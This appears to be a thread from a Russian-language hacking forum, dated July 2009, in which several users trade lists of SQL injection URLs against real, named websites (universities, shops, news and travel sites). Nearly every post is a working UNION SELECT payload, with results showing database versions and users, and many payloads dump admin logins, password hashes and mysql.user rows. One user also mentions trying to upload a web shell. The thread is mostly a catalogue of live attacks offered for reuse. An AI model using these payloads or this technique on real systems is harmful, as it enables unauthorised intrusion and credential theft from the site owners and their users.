http://nadin.com.ru/hist.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5nadina@localhost:nadina_do:5.0.67-community-log
http://research.amnh.org/amcc/database/browse.php?order_id=102&phylum_id=2&class_id=4+union+select+concat_ws(char(58),user(), version())+limit+1,1--
Version: 4.1.22-log
User: www@localhost
Научный сайт какой-то.
Pagerank: 7
тИЦ: 190
http://www.indstate.edu/news/news.php?newsid=-1839%20union%20select%20username,2,3,password,5,6% 20from%20newslogin%20limit%203,1/*
http://www.indstate.edu/news/login.php
Notice: Undefined index: NID in D:\Inetpub\fpseroot\news\v-modify3.php on line 114
Skofield
16.07.2009, 13:46
http://www.ateneolawjournal.com/articlemain.php?id=-131'+union+select+1,version(),3,4,5,6,7/*
Database Version: 5.0.45-log
Database name: ateneola_www
User name: ateneola@cgi0603.int.bizland.net
www.helicom.hr
PR3
blind
http://www.helicom.hr/artikl.php?id=-12488+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(con cat_ws(0x3a,user(),version(),database()))),11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25+from+admin/*
ДБ: helicom@localhost:4.1.11-Debian_4sarge7-log:helico
Табличко: admin
http://www.millat.com/news.php?id=-7777+union+select+1,concat_ws(0x3a,database(),vers ion(),user()),3,4,5,6,7,8,9--
millaturdu:5.0.75:millat09@10.49.7.152
http://www.bp-rumyancevo.ru/news.php?id=-2+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4--
rumyancevo:5.0.51a:rumyancevo@localhost
ankarpoker.ru - любителям покера :)
http://ankarpoker.ru/news.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6--
u181477:5.0.67-log:u181477@10.10.153.188
beerhack
16.07.2009, 17:11
PR4
http://economice.ulbsibiu.ro/rom/eStudy/profesori.php?ID=15'+union+select+1,2,version(),4, 5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22/*
Database Version: 5.0.27-log
Database name: fac_economice
User name: economice@localhost
HAXTA4OK
16.07.2009, 22:39
http://www.rs.co.th/home/tv/tv_series.php?id=1+and+substring(version(),1,1)=5--
[PR 5]
http://www.radiobanyoles.cat/noticia.php?id=-4691+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3,4,5&t=La+companyia+Yllana+torna+a+Banyoles+amb+el+seu+ darrer+espectacle+Brokers5.0.32-Debian_7etch10-log:radiobanyoles_bd:radiobanyoles@localhost
===============================
[PR 5]
http://www.aperitif-a-la-francaise.com/en/public/recettes/recette.php?id=-247+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8,9,10,11,12,13,14,15,16,17 5.0.27-standard:aperitif_en:sopeuser@localhost
===============================
[PR 4]
http://www.espavino.com/spain/wine.php?id=-2257+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),user()),7,8,9,10&wein=La%20Vi%C3%B1a5.0.45:14913_favoriten:14913_fa voriten@localhost
===============================
[PR 4]
http://modernlanguages.louisville.edu/spanish/videos_spanish/show_video.php?id=-1067+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15&Video_Title=La%20lengua%20de%20las%20mariposas5.0. 27-standard:cml-spanish:mfmedi01@136.165.237.209http://modernlanguages.louisville.edu/spanish/videos_spanish/show_video.php?id=-1067+union+select+1,concat_ws(0x3a,id,username,pas swd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+cml.user shttp://modernlanguages.louisville.edu/spanish/videos_spanish/show_video.php?id=-1067+union+select+1,concat_ws(0x3a,id,username,pas swd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+spanish. usershttp://modernlanguages.louisville.edu/spanish/videos_spanish/show_video.php?id=-1067+union+select+1,concat_ws(0x3a,id,username,pas swd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+trinity. user===============================
[PR 3]
http://www.domaine-la-fourmone.com/bouteille2_gb.php?id=-15+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,7,8,9,10,11,12,13,14,15,16,175 .0.32-Debian_7etch8-log:my116691:my116691@62.193.203.175
http://www.ruig-gian.org/news/news.php?ID=-40+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5,6,7,8,9,10,11--
ruig-gianorg3:5.0.45-log:ruigadmin@localhost
http://www.smash-uk.com/frf09/news.php?id=-40+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5,6--
fujirock:5.0.67-userstats-log:fuji06@firestone.dreamhost.com
http://diamondring.gimalai.org/new.php?id=-22+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7--
diamondring:5.0.54-log:diamondring@localhost
http://www.mapawproject.com/news.php?ID=-5+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4,5,6,7,8--
mapaw:5.0.27:geoffins@72.26.101.80
http://www.crazyhoroscopes.com/display-news.php?id=-5+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4--
arif:5.0.51a-24+lenny1:arif@localhost
http://www.germanfirms.ru/products.php?id=-6+union+select+concat_ws(0x3a,version(),database() ,user())--
4.1.22-standard-log:db156426_4:db156426_4@local2
http://www.naturalaquario.com/products.php?id=-6+union+select+1,concat_ws(0x3a,version(),database (),user())--
5.0.81-community:natuocom_naturalaqua:natuocom_ang@localh ost
http://www.freshmushroomfarm.org/products.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),databa se(),user())--
5.0.81-community-log:freshmus_fmf:freshmus_fmfweb@localhost
http://ostrova.onego.ru/hotel.php?id=-4+union+select+concat_ws(0x3a,version(),database() ,user())--
5.0.37:ostrovadb:ostrova_user@home.onego.ru
http://www.kerkira.ru/Hotels/hotel.php?ID=4&i=0&ID_Region=-4+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7--
4.1.22-log:wwwkerkiraru:kerkir01@fe52-1.hc.ru
http://www.sanpancrazioviaggi.it/front/de/hotel.php?id=-999+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8/*
5.0.37-community-nt:sanpancrazio:viaggisan@localhost
http://www.exploringcostarica.com/ing/hotel.php?id=4+union+select+1,concat_ws(0x3a,versi on(),database(),user()),3,4,5,6,7,8,9--
4.1.22-standard-log:explorin_bdexplorin:explorin_usExplo@localhost
http://hi-tekmexico.com/spanish/hotel.php?id=-4+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23--
4.1.25-Debian_mt1-log:db9596_secture
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=-4+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11--
5.0.67.d7-ourdelta-log:viajando_:viajando_@208.109.181.90
ООО «МАКстрой»
http://www.jbi-cement.ru/?option=news&page=1&id=-5+union+select+1,concat_ws(char(58),TABLE_SCHEMA,T ABLE_NAME,COLUMN_NAME),3+from+INFORMATION_SCHEMA.C OLUMNS+limit+159,1/*
Детские автокресла Kiddy
http://optilab.ru/disable/rus-kiddy/?t=-5+union+select+1,2,concat_ws(char(58),TABLE_SCHEMA ,TABLE_NAME,COLUMN_NAME),4,5,6,7,8+from+INFORMATIO N_SCHEMA.COLUMNS--
mailbrush
17.07.2009, 11:55
http://www.domaine-la-fourmone.com/bouteille2_gb.php?id=-15+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17m y116691@62.193.203.175:my116691:5.0.32-Debian_7etch8-log
http://www2.mtvindia.com/news/news.php?id=-153+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,pass word,user),9+from+mysql.user--
Сайт индийского MTV :)
http://62.105.76.90:81/benefex/whats_new/market_news/news.php?id=-1+union+select+1,2,group_concat(table_name),4,5,6, 7,8,9,10+from+information_schema.tables--
http://www.fujibikes.com.br/2009/news.php?id=153%20and%20substring(version(),1,1)=5
pr:4
tuc:0
version:5.x.x.x
http://www.meat-trade.com/prg/news.php?id=-1+union+select+1,group_concat(table_name),3,4+from +information_schema.tables--
http://www.fiercekitten.com/blog/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),passw d),6,7+from+neener_members--
http://www.lygus.lt/ITC/news.php?id=-1+union+select+1,group_concat(table_name),3,4,5+fr om+information_schema.tables--
http://qaf.mskiteonline.com/news.php?id=153%20and%20substring(version(),1,1)=4
http://sibselmash.nsk.ru/news.php?id=-1%20union%20select%201,2,3,concat_ws(0x3a,log,psw) ,5,6,7+from+psw--
http://www.wicable.tv/news_and_resources/news.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+infor mation_schema.tables+limit+30,1--
[PR 6]
http://www.gmm.gu.se/groups/pedersen/popDetail.php?ID=-8+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user()),8,9,10,11,12,13,14--5.0.45:dbldbase:dbl@localhost
http://www.gmm.gu.se/groups/pedersen/popDetail.php?ID=-8+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,pas sword,file_priv),8,9,10,11,12,13,14+from+mysql.use r--===============================
[PR 6]
http://www.coandco.cc/mutat.php?id=9999999999+union+select+1,2,3,4,conca t_ws(0x3a,version(),database(),user()),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,355.0.81:coandco:coandco@loc alhost
===============================
[PR 4]
http://uz.cafspeech.kz/site.php?id=4&lan=english&newsid=-126+union+select+concat_ws(0x3a,version(),database (),user())5.0.41-community-nt:uz_cafspeech:cafspeech@localhost
===============================
[PR 3]
http://www.mgce.uz.ua/post.php?id=-277+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),65.0.45-log:mgce_d2:mgce_d2@192.168.2.2
===============================
[PR 3]
http://www.gslc.cc/displaycms.php?id=-58+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),55.0.67-custom-log:goodshepherdcms:goodshepheradmin@apache2-sith.jubilee.dreamhost.com
===============================
[PR 1]
http://www.nationaltravel.com.py/v1/detalle.del.paquete.php?id=-16+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,105.0.67-community:national_national:national_natio@localho st
http://www.snap.co.uk/shop/nav.php?&dff_catnum=-193+union+select+1,concat_ws(0x3a3a,user(),databas e(),version()),3,4,5+--+
http://www.geekroom.co.uk/ablog/index.php?cat=-1+union+select+1,version()+--+
http://www.revell.ro/store/index.php?action=ViewGroups&grp=-401+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
Database Version: 4.1.22-standard
Database name: revell_store
User name: revell_store@localhost
OS: pc-linux-gnu
http://www.crazyhoroscopes.com/display-news.php?id=-5+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4--
arif:5.0.51a-24+lenny1:arif@localhost
http://alink-design.com/news.php?id=-2+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6--
alinkdesign:5.0.67.d7-ourdelta-log:alinkdesign@72.167.232.143
http://wired.st-and.ac.uk/~wong/agent/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user())--
wong:5.0.32-Debian_7etch10-log:wong@wired.st-and.ac.uk
http://www.myhopeyouth.com/news.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5--
myhope_site:4.1.22-standard:myhope_admin@localhost
http://autosklad35.ru/news/news.php?id=-4+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5--
asklad_sklad:5.0.81-community:asklad_sklad@localhost
http://www.idijabar.or.id/news.php?aksi=detail&id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7,8--
idijabar_ididb:5.0.67-community:idijabar_aatea@localhost
Calcutta
18.07.2009, 15:04
http://www.verav.ru/common/mpublic.php?num=12311+union+select+1,2,3,4,group_c oncat(0x3a,username,0x3a,admin,0x3a,kwort),6,7,8,9 ,0,1,2,3,4,5,6,7,8,9,0,1+from+user
mr.gr33n
18.07.2009, 22:02
пр3 ТиЦ 30
http://www.vs.com.ua/a-news/news.php?id=-25+union+select+1,2,3,concat(login,0x3a,password), 5,6,7,8,9,0+from+aadm_users--
PR: 3 ТиЦ: 20
http://www.iks.com.ua/rus/aktualno/novyny/news.php?id=-25+union+select+1,2,3,4,concat(username,0x3a,user_ password),6,7,8,9,0,1+from+phpbb_users--
HAXTA4OK
18.07.2009, 23:10
http://dinero.tv/mostrar.nota.php?id=-1+union+select+1,concat_ws(0x3a,database(),user(), version()),3,4,5,6--
http://cmup.fc.up.pt/cmup/v2/view/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,password,nom e),6,7+from+users--
_http://www.tippsupportersclub.com/news.php?id=-1+union+select+1,2,group_concat(column_name),4,5+f rom+information_schema.columns+where+table_name=0x 6a756e696f7273--
mr.gr33n
19.07.2009, 05:06
PR:1 тИц:10
http://www.neolitica.ru/article.php?id=-8+union+select+1,version(),database(),concat(login ,0x3a,pass),5,user(),7,8,9+from+bgblog.user--
mailbrush
19.07.2009, 09:23
http://www.vashiokna.com.ua/calc.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version())/*
u_vashiokna@localhost:vashiokna:4.1.22-log
HAXTA4OK
19.07.2009, 10:30
http://couleurcantal.tv/chaines.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6--&limit=6
root@localhost:fal:5.0.32-Debian_7etch5-log
tables: admin,partenaires,chaines,tags,comment,videos,news letter,pages
login:pass
http://couleurcantal.tv/chaines.php?id=-1+union+select+1,group_concat(concat_Ws(0x3a,login ,pass)),3,4,5,6+from+admin--&limit=6
eCTb MYSQL.user
http://couleurcantal.tv/chaines.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,user, password,file_priv)),3,4,5,6+from+mysql.user--&limit=6
####################################
http://www.nashe.tv/forum/viewmsg.php?msg_id=-725+union+select+1,2,3,concat_Ws(0x3a,user(),datab ase(),version()),5,6,7,8--
u_nashe@localhost:nashe:4.1.22-log
beerhack
19.07.2009, 12:34
PR 4
http://nemo.mwd.hartford.edu/mwd08/news.php?id=-13+union+select+1,2,version(),4--
Database Version: 5.0.45-log
Database name: websitedata
User name: iitsite@localhost
PR 4
http://cityculture.org/city.php?id=-3063+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,d atabase(),version(),user()),10,11,12,13,14,15,16,1 7,18,19,20--
PR 4
http://www.vector-images.com.ua/vector.php?vect_id=-8+union+select+concat_ws(0x3a,database(),version() ,user())--
PR 3, ТИЦ 30
http://www.blacktyres.ru/pages/disks/vendor.php?id=-42+union+select+concat_ws(0x3a,database(),version( ),user())--
PR 2
http://www.modsearch.com/reviews/vendor.php?id=-148+union+select+1,2,3,4,5,concat_ws(0x3a,database (),version(),user()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26--
PR 2
http://www.bringitontours.com/package/index.php?destination_id=-1+union+select+1,2,concat_ws(0x3a,database(),versi on(),user())--
WAPLOG.EU/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+30,1--
и т.д.
ЗЫ: Можно заменить линк любоко сайта на свой
Узнать можно так
WAPLOG.EU/outtop.php?uid=-238+union+select+concat_ws(0x3a,site_name,link,pas s,email)+from+users+where+uid=254--
Где UID номер зарегистрированного сайта
http://www.factway.net/en/news.php?id=-9+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7,8,9--
factway_factway:5.0.81-community:factway_factway@localhost
http://www.oekoeffizienz.at/news.php?id=-9+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,data base(),version(),user()),10,11,12--
oekoeffizienz:5.0.32-Debian_7etch10-log:oeko@localhost
http://www.spcf.edu.ph/nextpage/news.php?t=1&id=-38+union+select+1,2,3,4,5,6,concat_ws(0x3a,databas e(),version(),user()),8,9,10--
spcfedup_spcfdbf:5.0.81-community:spcfedup@localhost
beerhack
20.07.2009, 05:41
http://www.hendersonpartnersllp.ca/bios.php?id=-41+union+select+1,version(),3,4,5,6/*
Database Version: 5.0.45
Database name: royliu
User name: royliu@76.12.13.92
делать было нефиг:
http://strelok-ohotnik.com.ua/news.php?action=one&id=13+union+select+1,2,concat_ws(0x3a,username,use r_password),4,5,6,7,8,9,10+from+phpbb_users+where+ user_id=56--
http://www.kraina-z.com.ua/ua/news.php?id=22'+union+select+1,table_name,3,4,5+fr om+information_schema.tables+limit+100--%201
mailbrush
20.07.2009, 12:34
http://www.facody.com/sat.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7/*facodycom@212.81.143.131:facodycom:5.0.27
HAXTA4OK
20.07.2009, 21:17
PR: 7
http://tv.jlu.edu.cn/v2/index.php?o=showc;id=-1+union+select+1,concat_Ws(0x3a,user(),database(), version()),3,4,5--
tvwing@localhost:tv:4.0.22-standard
FC milan :D
http://www.clubmilan.net/news.php?id=-484+union+select+1,concat_ws(0x3a,database(),versi on(),user()),3,4,5,6,7--
CBMILAN_DB:5.0.81-COMMUNITY-LOG:CBMILAN_US@LOCALHOST
Matrix ебт :p
http://www.mxo.it/news.php?id=-60+union+select+concat_ws(0x3a,database(),version( ),user())--
Sql12117_5:4.0.30-standard-log:Sql12117@62.149.141.22
[PR 6]
http://www.hellotourist.net/sajatlap.php?ID=-14227+union+select+1,2,3,4,5,6,7,8,version(),10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 ,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76_+CA+ LA+SOMARA+Arzachena+Hotel5.0.45-Debian_1ubuntu3.4-log:janositibor:janositibor@localhost
===================================
[PR 6]
http://www.jugglingdb.com/events/index.php?id=-7511+union+select+1,2,3,concat_ws(0x3a,version(),d atabase(),user()),5,6,7,8,9,10,11,12,13,14,15,16,1 7,18&lang=ca5.0.27:ijdb:colin@localhost
===================================
[PR 4]
http://dev.4spe.org/cc/detail.php?id=-294+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,305.0.51a-3ubuntu5.1-log:spe:speweb@localhost
===================================
[PR 4]
http://www.cc-vw.org/index.php?id=974&level=-7+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6--5.0.45-log:sr0781254:sr0781254@81.31.99.12
===================================
[PR 3]
http://cc.cc.moose.cc/maps/results.php?id=-13+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,245.0.77-community:cc_blog:cc_php@localhost
http://cc.cc.moose.cc/maps/results.php?id=-13+union+select+1,concat_ws(0x3a,user_login,user_p ass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24+from+cc_blog.wp_users=============== ====================
[PR 0]
http://www.badlaav.co.cc/page.php?id=-19+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user())5.0.81-community:mechier_badlaav:mechier_dbuser@localhost
beerhack
21.07.2009, 03:12
PR 6
http://www.rha.msu.edu/news.php?id=13+union+select+1,2,3,4,5,6,7,8,versio n(),0/*
Database Version: 5.0.44-log
Database name: rha
User name: rha@localhost
HAXTA4OK
21.07.2009, 09:19
http://www.hey-u.tv/detail/detail.php?nr=26&id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47--
x000102w@localhost:x000102w:5.0.51a-Max
###################################
PR=5
скажите в чем прикол...+and+1=0 нужно что бы выдало результат мне ?? :) первый раз так подставляю
http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,concat_WS(0x 3a,user(),database(),version()),3,4,5,6,7,8,9--
root@210.22.13.89:ipanel:5.0.26-standard-log
есть mysql.user
http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,'p',3,4,5,6, 7,8,9+from+mysql.user--
result: p , MQ= off
tables:BakVoucherHead,VoucherHead200008,Ledgers,Vo ucherMain200009,VoucherHead200004,CurrencySys,Vouc herMain200005,VoucherHead199912,BankDiary,VoucherM ain200001,ReceivableAge,BakVoucherMain,VoucherHead 200009,Profit,VoucherMain200010,VoucherHead200005, Departments,VoucherMain200006,VoucherHead200001,Ba nks,VoucherMain200002,SysLog,BankBalanceAdjust,Vou cherHead200010,ProfitX,VoucherHead200006,LedgerAbs tract,VoucherMain200007,VoucherHead200002,CashBala nceAdjust,VoucherMain200003,Users,BankBursarAdjust ,VoucherMain199911,QueryTempHead,AssetDebt,Voucher Head200007,LedgerBalance,VoucherMain200008,Voucher Head200003,CashDiary,VoucherMain200004,VoucherHead 199911,BankCheck,VoucherMain199912,QueryTempMain,G roups,ImageGroups,Images,QueryTempHead,VoucherMain 200002,LedgerBalance,VoucherHead200003,VoucherHead 199911,QueryTempMain,VoucherMain200003,Ledgers,Vou cherMain199911,VoucherHead199912,CashDiary,Receiva bleAge,Profit,VoucherMain199912,Departments,Vouche rHead200001,CountDetail_temp,SysLog,ProfitX,Vouche rMain200001,LedgerAbstract,VoucherHead200002,Curre ncySys,Users,viewFile,viewcont,linkBook,users,link Book,users,viewFile,viewcont,contenttype,Receivabl eAge,VoucherMain200008,CashDeal_back_8_29,VoucherH ead200210,VoucherMain200108,VoucherHead200105,Vouc herMain200106,VoucherHead200005_backup,ProfitX,Vou cherMain200006,Banks,VoucherMain200209,VoucherHead 200206,VoucherHead200101,VoucherMain200102,Voucher Head200003_backup,VoucherMain200004,LedgerBalance, VoucherMain200205,VoucherHead200202,BankBalanceAdj ust,VoucherHead200010,VoucherMain200010_backup,Vou cherHead200002,VoucherMain200002,DateTableRemark,V oucherMain200201,VoucherHead200110,BakVoucherHead, VoucherHead200008,SysLog,VoucherMain200008_backup, CashDeal_back_9_10,VoucherHead200211,VoucherMain20 0109,VoucherHead200106,VoucherHead200006,VoucherMa in200107,QueryTempHead,VoucherMain200006_backup,Ca shBalanceAdjust,VoucherMain200210,VoucherHead20020 7,VoucherHead200102,VoucherMain200103,VoucherHead2 00004,VoucherMain200004_backup,LedgerBalance_backu p,BankBursarAdjust,VoucherMain200206,VoucherHead20 0203,VoucherHead200010_backup,VoucherMain200011,Vo ucherHead200002_backup,VoucherMain200002_backup,De partments,Vouchнекоторые повторяются
####################################
PR=4
http://chamjb.eduhope.net/bbs/comment_write.php?board=chamjic-2&id=303&mode=modify&no=281+and+substring(version(),1,1)=4--
петрович
21.07.2009, 11:53
http://www.vizginta.lt/index.php?ka_rodyti=problemos&pr_nr=1'+UNION+SELECT+1,2,3/*
HAXTA4OK
21.07.2009, 12:49
http://www.ribera.tv/videos.php?id=1+union+select+1,concat_ws(0x3a,user (),database(),version()),3,4,5,6,7,8,9,10,11,12,13 ,14,15--
ribera00_video@localhost:ribera00_video:4.1.22-standard
####################################
http://yt-export.com/details.php?kind=07&kinds=07a23&id=-1'+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11,12%23
ytexportcom@218.5.74.137:ytexportcom:5.0.41-log
####################################
PR: 5
http://www.ee.ndhu.edu.tw/main.php?main=dept_course_detail&id=1&idc=134'+and+substring(version(),1,1)=5%23
####################################
Pashkela опять для тебя =)опять не смог залить шелл ((( (если зальеш кинь в личку )))))
PR: 4
http://www.catolica.edu.sv/inicio.php?name=Decanato&id=-1'+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12,13+from+mysql.u ser+--+
5.0.26-Max:root@localhost:ppal
http://www.snis.ch/conference.php?ID=-13+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12,13--
PR 0
Верия - 5.0.67-log
database - swissinternationalstudiesch
user -wsnis@imu143.infomaniak.ch
http://www.forumgallery.com/current_on1.php?id=222+union+select+1,2,3,4,5,6,7, 8,9,concat_ws(0x3a,database(),version(),user()),11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 ,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,7 8,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94, 95,96,97,98,99,100,101,102,103,104,105,106,107,108 ,109,110,111,112,113,114,115,116,117,118,119,120,1 21,122,123,124,125,126,127,128,129,130,131,132,133 ,134,135,136,137,138,139,140,141,142,143,144,145,1 46,147,148,149,150,151,152,153,154,155,156,157,158 ,159,160,161,162--
:eek:
forumgallery:4.1.22:forumg63@localhost
http://www.metallicafan.de/news.php?id=-188+union+select+1,2,3,4,5,6,concat_ws(0x3a,databa se(),version(),user()),8,9--
DB40286:4.0.27-log:www.metallicafan.de@jenkins.stor
http://europeanspeedclub.com/news.php?id=-930+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,data base(),version(),user()),9,10,11,12--
ideallinie:5.0.32-Debian_7etch6-log:ideallinie@localhost
http://www.jestemdobry.pl/news.php?ID=-9+union+select+1,concat_ws(0x3a,database(),version (),user()),3--
jestemdobry:5.0.45:jestemdobry_db@localhost
PR 5, ТИЦ 450
http://www.russkie.org/place.php?module=strana&id=-12+union+select+1,concat_ws(0x3a,database(),versio n(),user())--
PR 5
http://www.peter-pearson.com/fireupflash/project.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,email,user name,thepass),7,8,9,10,11,12,13,14,15,16,17,18+fro m+users--
PR 3, ТИЦ 20
http://www.devision.com.ua/project.php?cat=1&sid=2&id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),v ersion(),user()),6,7,8,9,10,11,12,13,14--
PR 3
http://www.sammakorn.co.th/project.php?ID=-1+union+select+1,2,3,4,5,concat_ws(0x3a,database() ,version(),user()),7--
PR 3
http://www.chastainconstruction.com/project.php?ID=1+union+select+concat_ws(0x3a,datab ase(),version(),user()),2,3,4,5--
вывод в исходном коде: projimg_chastain:4.1.20:wsdr@localhost
PR 3
http://www.unbound-media.com/project.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,databa se(),version(),user()),9,10--
Skofield
22.07.2009, 01:10
PR 4
http://www.bishopdwenger.com/content.php?id=-64+union+select+group_concat(username,0x3a,passwor d),2+from+admin/*
Database Version: 5.0.45-log
Database name: bishop_dwenger
User name: bd_dbsiteuser@localhost
beerhack
22.07.2009, 01:26
http://www.paceeducation.ca/course.php?id=-41+union+select+version(),2--
Database Version: 5.0.51a
Database name: pace
User name: pace@localhost
--------------------------------------------------------------------
http://www.initiativa.ru/index.php?id=39+union+select+1,2,unhex(hex(version ())),4/*
Database Version: 4.1.16-log
Database name: init
User name: init@localhost
--------------------------------------------------------------------
http://artelf.ru/items.php?id=-39+union+select+1,unhex(hex(version())),3,4,5,6,7, 8,9,0/*
Database Version: 4.1.18
Database name: artelf
User name: artelf@localhost
http://www.slavsandtatars.com/about.php?id=-1+union+select+unhex(hex(concat_ws(0x3a,username,p asswd))),2,3+from+admin--
HAXTA4OK
22.07.2009, 09:42
http://www.liceocastilla.edu.sv/vista_galeria.php?id=1'+union+select+1,2,3,concat_ Ws(0x3a,user(),database(),version()),5,6/*
liceocas@host20.digitalvalley.com:liceocastilla_ed u_sv_colegio:5.0.45
обеденный пиррифф..
http://athletics.carrollu.edu/news_detail.asp?newsid=-2582+union+select+1,2,3,username,password,6,7,8+fr om+cms.cmsuser/*
Version: 5.0.22-community-nt
User: web@localhost
Dbname: athletics
file_priv=Y
=)
ell.kz/index.php?id=2&target=163 and ascii(substring(user(),4,1))<95
Вот что поканабрал : DHT
http://sotovikcity.ru/phone.php?ID=-1+union+select+1,concat_WS(0x3a,name,password),3+f rom+auth--
http://cifravoz.ru/views3.php?id=-173+union+select+1,group_concat(table_name),3,4,5, 6,7+from+information_schema.tables--
http://msmobiles.com/mobile/news.php?id=-1+union+select+1,2,unhex(hex(group_concat(concat_W S(0x3a,rus_login,rus_password)))),4,5,6,7,8,9,10,1 1,12,13,14,15+from+msmo_registered_users--
http://classifieds.bechna.com/view_sale_details.php?id=-1+union+select+pass,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15+from+admin--&city=Delhi
http://www.chat.hcgomel.com/news.php?ID=-311+union+select+1,2,3,unhex(hex(concat_ws(0x3a,us ername,user_password,user_icq))),5,6,7,8+from+phpb b_users+limit+0,1--
http://www.pioner.su/news.php?id=-30+union+select+1,concat_ws(0x3a,version(),user(), database(),@@version_compile_os),3--
4.1.22-log:allianc0_@localhost:allianc0_:portbld-freebsd6.1
http://www.rstd.ru/news.php?id=-30+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6--
5.0.67-log:u145464_2:u145464@10.10.153.183
http://www.tviphilippines.com/article.php?id=-21+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9,10,11,12,13,14--
5.0.81-community-log:tviphili_tviphil@localhost:tviphili_tviphils
http://www.kotogoto.com/article.php?id=21+union+select+1,2,3,concat_ws(0x3 a,version(),database(),user()),5,6--
5.0.24a-Debian_2.dotdeb.0-log:db25283:db25283@localhost
http://www.grp-s.ru/article.php?id=-21+union+select+concat_ws(0x3a,version(),user(),ve rsion(),database()),2,3,4--
5.0.67-log:grpsgrp_grps@localhost:5.0.67-log:grpsgrp_grps
